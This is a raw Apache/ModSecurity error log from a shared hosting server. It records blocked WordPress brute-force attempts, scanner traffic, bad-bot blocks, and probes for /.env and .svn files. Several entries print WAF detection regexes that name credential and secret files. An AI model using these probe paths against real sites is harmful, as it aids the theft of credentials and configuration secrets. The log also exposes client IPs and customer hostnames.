[Tue May 26 15:36:13.857679 2026] [security2:error] [pid 724639:tid 724874] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwlRKJRbiNp3eWdT2HPgAAAO4"]
[Tue May 26 15:36:14.648570 2026] [security2:error] [pid 724639:tid 724809] [client 146.174.160.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwlhKJRbiNp3eWdT2HVwAAAK0"]
[Tue May 26 15:36:15.949262 2026] [security2:error] [pid 724639:tid 724775] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwlxKJRbiNp3eWdT2HewAAAIs"]
[Tue May 26 15:36:18.380493 2026] [security2:error] [pid 724639:tid 724789] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwmRKJRbiNp3eWdT2HvQAAAJk"]
[Tue May 26 15:36:19.586717 2026] [security2:error] [pid 724639:tid 724810] [client 31.57.184.20:53247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-login.php"] [unique_id "ahVwmxKJRbiNp3eWdT2H6gAAAK4"]
[Tue May 26 15:36:19.941009 2026] [security2:error] [pid 724639:tid 724801] [client 31.57.184.20:55414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-login.php"] [unique_id "ahVwmxKJRbiNp3eWdT2H8gAAAKU"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 15:36:20.791952 2026] [security2:error] [pid 724639:tid 724875] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwnBKJRbiNp3eWdT2IBQAAAO8"]
[Tue May 26 15:36:21.908706 2026] [security2:error] [pid 724639:tid 724815] [client 31.57.184.20:55647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-login.php"] [unique_id "ahVwnRKJRbiNp3eWdT2IMwAAALM"], referer: https://www.google.com/
[Tue May 26 15:36:22.774159 2026] [security2:error] [pid 724639:tid 724775] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwnhKJRbiNp3eWdT2IRQAAAIs"]
[Tue May 26 15:36:23.630854 2026] [security2:error] [pid 724639:tid 724874] [client 147.53.122.96:51931] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVwnxKJRbiNp3eWdT2IWQAAAO4"], referer: https://anujtradingco.com
[Tue May 26 15:36:25.161662 2026] [security2:error] [pid 724639:tid 724840] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwoBKJRbiNp3eWdT2IgQAAAMw"]
[Tue May 26 15:36:26.036565 2026] [security2:error] [pid 724639:tid 724851] [client 223.123.38.127:15195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwohKJRbiNp3eWdT2InQAAANc"]
[Tue May 26 15:36:26.036751 2026] [security2:error] [pid 724639:tid 724851] [client 223.123.38.127:15195] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwohKJRbiNp3eWdT2InQAAANc"]
[Tue May 26 15:36:26.485659 2026] [security2:error] [pid 724639:tid 724684] [remote 103.11.102.106:40648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVwohKJRbiNp3eWdT2IowAAnyw"]
[Tue May 26 15:36:26.556266 2026] [security2:error] [pid 724639:tid 724864] [client 192.178.8.101:57781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVwohKJRbiNp3eWdT2IqwAAAOQ"]
[Tue May 26 15:36:27.602964 2026] [security2:error] [pid 724639:tid 724818] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwoxKJRbiNp3eWdT2IwwAAALY"]
[Tue May 26 15:36:27.844786 2026] [security2:error] [pid 724639:tid 724786] [client 172.70.242.26:10236] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahVwohKJRbiNp3eWdT2IugAAAJY"]
[Tue May 26 15:36:28.031967 2026] [security2:error] [pid 724639:tid 724827] [client 62.60.130.233:57258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "alphaelectronics.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVwoxKJRbiNp3eWdT2I0wAAAL8"], referer: https://www.bing.com/
[Tue May 26 15:36:28.389446 2026] [security2:error] [pid 724639:tid 724885] [client 62.60.130.233:58130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "alphaelectronics.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVwpBKJRbiNp3eWdT2I5wAAAPk"]
[Tue May 26 15:36:29.276112 2026] [security2:error] [pid 724639:tid 724849] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwpBKJRbiNp3eWdT2I9AAAANU"]
[Tue May 26 15:36:29.666208 2026] [security2:error] [pid 724639:tid 724763] [remote 106.215.143.20:23060] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahVwpRKJRbiNp3eWdT2JBQAAqXs"], referer: https://samayikprasanga.in/epaper.php?pn=2
[Tue May 26 15:36:29.666246 2026] [security2:error] [pid 724639:tid 724763] [remote 106.215.143.20:23060] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahVwpRKJRbiNp3eWdT2JBQAAqXs"], referer: https://samayikprasanga.in/epaper.php?pn=2
[Tue May 26 15:36:30.057038 2026] [security2:error] [pid 724639:tid 724702] [remote 106.215.143.20:23060] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahVwphKJRbiNp3eWdT2JGAAA7T4"], referer: https://samayikprasanga.in/contact.php
[Tue May 26 15:36:30.073727 2026] [security2:error] [pid 724639:tid 724798] [client 106.215.143.20:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahVwphKJRbiNp3eWdT2JGgAAAKI"], referer: https://samayikprasanga.in/contact.php
[Tue May 26 15:36:30.899807 2026] [authz_core:error] [pid 724639:tid 724810] [client 176.65.139.236:58300] AH01630: client denied by server configuration: /home2/azurm42s/communedediende.azurmediatec.com/.env
[Tue May 26 15:36:31.400261 2026] [security2:error] [pid 724639:tid 724844] [client 223.123.38.127:15196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwpxKJRbiNp3eWdT2JVAAAANA"]
[Tue May 26 15:36:31.400401 2026] [security2:error] [pid 724639:tid 724844] [client 223.123.38.127:15196] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwpxKJRbiNp3eWdT2JVAAAANA"]
[Tue May 26 15:36:31.455065 2026] [security2:error] [pid 724639:tid 724846] [client 220.181.108.82:25686] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; Baiduspider\\\\/2\\\\.0; \\\\+http:\\\\/\\\\/www\\\\.baidu\\\\.com\\\\/search\\\\/spider\\\\.html\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "9"] [id "901012"] [msg "Baidu Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "root.md-74.webhostbox.net"] [uri "/"] [unique_id "ahVwpxKJRbiNp3eWdT2JVQAAANI"]
[Tue May 26 15:36:31.507082 2026] [security2:error] [pid 724639:tid 724871] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwpxKJRbiNp3eWdT2JTQAAAOs"]
[Tue May 26 15:36:33.856014 2026] [security2:error] [pid 724639:tid 724813] [client 114.119.154.161:53077] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/international.html"] [unique_id "ahVwqRKJRbiNp3eWdT2JlgAAALE"], referer: https://aastha-enterprises.com/
[Tue May 26 15:36:34.239793 2026] [security2:error] [pid 724639:tid 724865] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwqRKJRbiNp3eWdT2JlQAAAOU"]
[Tue May 26 15:36:34.795426 2026] [security2:error] [pid 724639:tid 724793] [client 34.74.242.206:1594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVwqhKJRbiNp3eWdT2JsAAAAJ0"]
[Tue May 26 15:36:34.795541 2026] [security2:error] [pid 724639:tid 724793] [client 34.74.242.206:1594] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVwqhKJRbiNp3eWdT2JsAAAAJ0"]
[Tue May 26 15:36:34.943584 2026] [security2:error] [pid 724639:tid 724864] [client 34.74.242.206:1568] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "businessclubinternational.net"] [uri "/"] [unique_id "ahVwqhKJRbiNp3eWdT2JuwAAAOQ"]
[Tue May 26 15:36:34.943710 2026] [security2:error] [pid 724639:tid 724864] [client 34.74.242.206:1568] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "businessclubinternational.net"] [uri "/"] [unique_id "ahVwqhKJRbiNp3eWdT2JuwAAAOQ"]
[Tue May 26 15:36:35.568260 2026] [security2:error] [pid 724639:tid 724791] [client 195.178.110.34:44424] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVwqxKJRbiNp3eWdT2JxgAAAJs"]
[Tue May 26 15:36:35.801710 2026] [security2:error] [pid 724639:tid 724893] [client 195.178.110.34:44424] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVwqxKJRbiNp3eWdT2JygAAAQE"]
[Tue May 26 15:36:35.883527 2026] [security2:error] [pid 724639:tid 724778] [client 47.128.32.120:17392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/robots.txt"] [unique_id "ahVwqxKJRbiNp3eWdT2JywAAAI4"]
[Tue May 26 15:36:36.761102 2026] [security2:error] [pid 724639:tid 724839] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwrBKJRbiNp3eWdT2J1wAAAMs"]
[Tue May 26 15:36:37.358179 2026] [security2:error] [pid 724639:tid 724894] [client 23.158.233.124:55164] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVwrBKJRbiNp3eWdT2J7AAAAQI"], referer: https://binkes.net/
[Tue May 26 15:36:38.904994 2026] [security2:error] [pid 724639:tid 724818] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwrhKJRbiNp3eWdT2KIQAAALY"]
[Tue May 26 15:36:40.000322 2026] [security2:error] [pid 724639:tid 724830] [client 74.7.230.44:38730] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "keyamind.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVwrxKJRbiNp3eWdT2KRQAAwgE"]
[Tue May 26 15:36:41.496809 2026] [security2:error] [pid 724639:tid 724821] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwsRKJRbiNp3eWdT2KYgAAALk"]
[Tue May 26 15:36:41.547009 2026] [security2:error] [pid 724639:tid 724867] [client 176.65.139.231:38930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.shreegajanan.onesoft.in"] [uri "/.env"] [unique_id "ahVwsRKJRbiNp3eWdT2KbAAAAOc"]
[Tue May 26 15:36:43.525502 2026] [security2:error] [pid 724639:tid 724859] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwsxKJRbiNp3eWdT2KlgAAAN8"]
[Tue May 26 15:36:44.537018 2026] [security2:error] [pid 724639:tid 724890] [client 141.98.11.171:45356] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "onesoft.in"] [uri "/.env"] [unique_id "ahVwtBKJRbiNp3eWdT2KvAAAAP4"]
[Tue May 26 15:36:45.193554 2026] [security2:error] [pid 724639:tid 724844] [client 141.98.11.171:45646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "onesoft.in"] [uri "/.env"] [unique_id "ahVwtRKJRbiNp3eWdT2KzQAAANA"]
[Tue May 26 15:36:45.830283 2026] [security2:error] [pid 724639:tid 724785] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwtRKJRbiNp3eWdT2K1AAAAJU"]
[Tue May 26 15:36:46.847899 2026] [core:error] [pid 724639:tid 724649] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:46.847926 2026] [core:error] [pid 724639:tid 724649] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:47.588688 2026] [security2:error] [pid 724639:tid 724789] [client 114.119.150.168:36107] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahVwtxKJRbiNp3eWdT2LLQAAAJk"], referer: http://glorodavionics.com/beta/index.php?route=product/product&product_id=222
[Tue May 26 15:36:47.697601 2026] [security2:error] [pid 724639:tid 724670] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahVwtxKJRbiNp3eWdT2LNAAAjB4"]
[Tue May 26 15:36:48.094764 2026] [security2:error] [pid 724639:tid 724862] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwtxKJRbiNp3eWdT2LMwAAAOI"]
[Tue May 26 15:36:48.152694 2026] [core:error] [pid 724639:tid 724690] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:48.152736 2026] [core:error] [pid 724639:tid 724690] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:48.613205 2026] [core:error] [pid 724639:tid 724673] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:48.613233 2026] [core:error] [pid 724639:tid 724673] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:49.493824 2026] [core:error] [pid 724639:tid 724683] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:49.493843 2026] [core:error] [pid 724639:tid 724683] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:49.939325 2026] [security2:error] [pid 724639:tid 724790] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwuRKJRbiNp3eWdT2LaQAAAJo"]
[Tue May 26 15:36:51.183602 2026] [core:error] [pid 724639:tid 724764] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
